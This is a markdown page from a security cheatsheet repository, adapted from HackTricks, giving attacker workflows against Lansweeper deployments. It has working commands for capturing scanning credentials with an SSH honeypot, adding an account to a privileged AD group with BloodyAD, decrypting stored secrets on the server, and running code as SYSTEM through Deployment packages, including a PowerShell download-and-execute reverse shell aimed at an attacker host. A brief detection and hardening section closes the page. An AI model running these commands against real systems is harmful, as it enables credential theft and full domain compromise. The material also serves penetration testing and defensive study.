daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

lansweeper-security.md (8972B)


      1 ---
      2 title: "Lansweeper Abuse: Credential Harvesting, Secrets Decryption, and Deployment RCE"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/lansweeper-security.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/lansweeper-security.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Lansweeper Abuse: Credential Harvesting, Secrets Decryption, and Deployment RCE
     14 
     15 Lansweeper is an IT asset discovery and inventory platform commonly deployed on Windows and integrated with Active Directory. Credentials configured in Lansweeper are used by its scanning engines to authenticate to assets over protocols like SSH, SMB/WMI and WinRM. Misconfigurations frequently allow:
     16 
     17 - Credential interception by redirecting a scanning target to an attacker-controlled host (honeypot)
     18 - Abuse of AD ACLs exposed by Lansweeper-related groups to gain remote access
     19 - On-host decryption of Lansweeper-configured secrets (connection strings and stored scanning credentials)
     20 - Code execution on managed endpoints via the Deployment feature (often running as SYSTEM)
     21 
     22 This page summarizes practical attacker workflows and commands to abuse these behaviors during engagements.
     23 
     24 ## 1) Harvest scanning credentials via honeypot (SSH example)
     25 
     26 Idea: create a Scanning Target that points to your host and map existing Scanning Credentials to it. When the scan runs, Lansweeper will attempt to authenticate with those credentials, and your honeypot will capture them.<sup>[[1]](#references)</sup>
     27 
     28 Steps overview (web UI):
     29 - Scanning → Scanning Targets → Add Scanning Target
     30   - Type: IP Range (or Single IP) = your VPN IP
     31   - Configure SSH port to something reachable (e.g., 2022 if 22 is blocked)
     32   - Disable schedule and plan to trigger manually
     33 - Scanning → Scanning Credentials → ensure Linux/SSH creds exist; map them to the new target (enable all as needed)
     34 - Click “Scan now” on the target
     35 - Run an SSH honeypot and retrieve the attempted username/password
     36 
     37 Example with sshesame:<sup>[[2]](#references)</sup>
     38 
     39 ```yaml
     40 # sshesame.conf
     41 server:
     42   listen_address: 10.10.14.79:2022
     43 ```
     44 
     45 ```bash
     46 # Install and run
     47 sudo apt install -y sshesame
     48 sshesame --config sshesame.conf
     49 # Expect client banner similar to RebexSSH and cleartext creds
     50 # authentication for user "svc_inventory_lnx" with password "<password>" accepted
     51 # connection with client version "SSH-2.0-RebexSSH_5.0.x" established
     52 ```
     53 
     54 Validate captured creds against DC services:
     55 
     56 ```bash
     57 # SMB/LDAP/WinRM checks (NetExec)
     58 netexec smb   inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
     59 netexec ldap  inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
     60 netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
     61 ```
     62 
     63 Notes
     64 - Works similarly for other protocols when you can coerce the scanner to your listener (SMB/WinRM honeypots, etc.). SSH is often the simplest.
     65 - Many scanners identify themselves with distinct client banners (e.g., RebexSSH) and will attempt benign commands (uname, whoami, etc.).
     66 
     67 ## 2) AD ACL abuse: gain remote access by adding yourself to an app-admin group
     68 
     69 Use BloodHound to enumerate effective rights from the compromised account. A common finding is a scanner- or app-specific group (e.g., “Lansweeper Discovery”) holding GenericAll over a privileged group (e.g., “Lansweeper Admins”). If the privileged group is also member of “Remote Management Users”, WinRM becomes available once we add ourselves.<sup>[[1]](#references)[[5]](#references)</sup>
     70 
     71 Collection examples:
     72 
     73 ```bash
     74 # NetExec collection with LDAP
     75 netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhound -c All --dns-server <DC_IP>
     76 
     77 # RustHound-CE collection (zip for BH CE import)
     78 rusthound-ce --domain sweep.vl -u svc_inventory_lnx -p '<password>' -c All --zip
     79 ```
     80 
     81 Exploit GenericAll on group with BloodyAD (Linux):<sup>[[4]](#references)</sup>
     82 
     83 ```bash
     84 # Add our user into the target group
     85 bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '<password>' \
     86   add groupMember "Lansweeper Admins" svc_inventory_lnx
     87 
     88 # Confirm WinRM access if the group grants it
     89 netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
     90 ```
     91 
     92 Then get an interactive shell:
     93 
     94 ```bash
     95 evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
     96 ```
     97 
     98 Tip: Kerberos operations are time-sensitive. If you hit KRB_AP_ERR_SKEW, sync to the DC first:
     99 
    100 ```bash
    101 sudo ntpdate <dc-fqdn-or-ip>   # or rdate -n <dc-ip>
    102 ```
    103 
    104 ## 3) Decrypt Lansweeper-configured secrets on the host
    105 
    106 On the Lansweeper server, the ASP.NET site typically stores an encrypted connection string and a symmetric key used by the application. With appropriate local access, you can decrypt the DB connection string and then extract stored scanning credentials.<sup>[[1]](#references)</sup>
    107 
    108 Typical locations:
    109 - Web config: `C:\Program Files (x86)\Lansweeper\Website\web.config`
    110   - `<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">` … `<EncryptedData>…`
    111 - Application key: `C:\Program Files (x86)\Lansweeper\Key\Encryption.txt`
    112 
    113 Use SharpLansweeperDecrypt to automate decryption and dumping of stored creds:<sup>[[3]](#references)</sup>
    114 
    115 ```powershell
    116 # From a WinRM session or interactive shell on the Lansweeper host
    117 # PowerShell variant
    118 Upload-File .\LansweeperDecrypt.ps1 C:\ProgramData\LansweeperDecrypt.ps1   # depending on your shell
    119 powershell -ExecutionPolicy Bypass -File C:\ProgramData\LansweeperDecrypt.ps1
    120 # Tool will:
    121 #  - Decrypt connectionStrings from web.config
    122 #  - Connect to Lansweeper DB
    123 #  - Decrypt stored scanning credentials and print them in cleartext
    124 ```
    125 
    126 Expected output includes DB connection details and plaintext scanning credentials such as Windows and Linux accounts used across the estate. These often have elevated local rights on domain hosts:
    127 
    128 ```text
    129 Inventory Windows  SWEEP\svc_inventory_win  <StrongPassword!>
    130 Inventory Linux    svc_inventory_lnx        <StrongPassword!>
    131 ```
    132 
    133 Use recovered Windows scanning creds for privileged access:
    134 
    135 ```bash
    136 netexec winrm inventory.sweep.vl -u svc_inventory_win -p '<StrongPassword!>'
    137 # Typically local admin on the Lansweeper-managed host; often Administrators on DCs/servers
    138 ```
    139 
    140 ## 4) Lansweeper Deployment → SYSTEM RCE
    141 
    142 As a member of “Lansweeper Admins”, the web UI exposes Deployment and Configuration. Under Deployment → Deployment packages, you can create packages that run arbitrary commands on targeted assets. Execution is performed by the Lansweeper service with high privilege, yielding code execution as NT AUTHORITY\SYSTEM on the selected host.<sup>[[1]](#references)</sup>
    143 
    144 High-level steps:
    145 - Create a new Deployment package that runs a PowerShell or cmd one-liner (reverse shell, add-user, etc.).
    146 - Target the desired asset (e.g., the DC/host where Lansweeper runs) and click Deploy/Run now.
    147 - Catch your shell as SYSTEM.
    148 
    149 Example payloads (PowerShell):
    150 
    151 ```powershell
    152 # Simple test
    153 powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt"
    154 
    155 # Reverse shell example (adapt to your listener)
    156 powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rs.ps1')"
    157 ```
    158 
    159 OPSEC
    160 - Deployment actions are noisy and leave logs in Lansweeper and Windows event logs. Use judiciously.
    161 
    162 ## Detection and hardening
    163 
    164 - Restrict or remove anonymous SMB enumerations. Monitor for RID cycling and anomalous access to Lansweeper shares.
    165 - Egress controls: block or tightly restrict outbound SSH/SMB/WinRM from scanner hosts. Alert on non-standard ports (e.g., 2022) and unusual client banners like Rebex.
    166 - Protect `Website\\web.config` and `Key\\Encryption.txt`. Externalize secrets into a vault and rotate on exposure. Consider service accounts with minimal privileges and gMSA where viable.
    167 - AD monitoring: alert on changes to Lansweeper-related groups (e.g., “Lansweeper Admins”, “Remote Management Users”) and on ACL changes granting GenericAll/Write membership on privileged groups.
    168 - Audit Deployment package creations/changes/executions; alert on packages spawning cmd.exe/powershell.exe or unexpected outbound connections.
    169 
    170 ## Related topics
    171 - SMB/LSA/SAMR enumeration and RID cycling
    172 - Kerberos password spraying and clock skew considerations
    173 - BloodHound path analysis of application-admin groups
    174 - WinRM usage and lateral movement
    175 
    176 ## References
    177 - [1] [HTB: Sweep — Abusing Lansweeper Scanning, AD ACLs, and Secrets to Own a DC (0xdf)](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html)
    178 - [2] [sshesame (SSH honeypot)](https://github.com/jaksi/sshesame)
    179 - [3] [SharpLansweeperDecrypt](https://github.com/Yeeb1/SharpLansweeperDecrypt)
    180 - [4] [BloodyAD](https://github.com/CravateRouge/bloodyAD)
    181 - [5] [BloodHound CE](https://github.com/SpecterOps/BloodHound)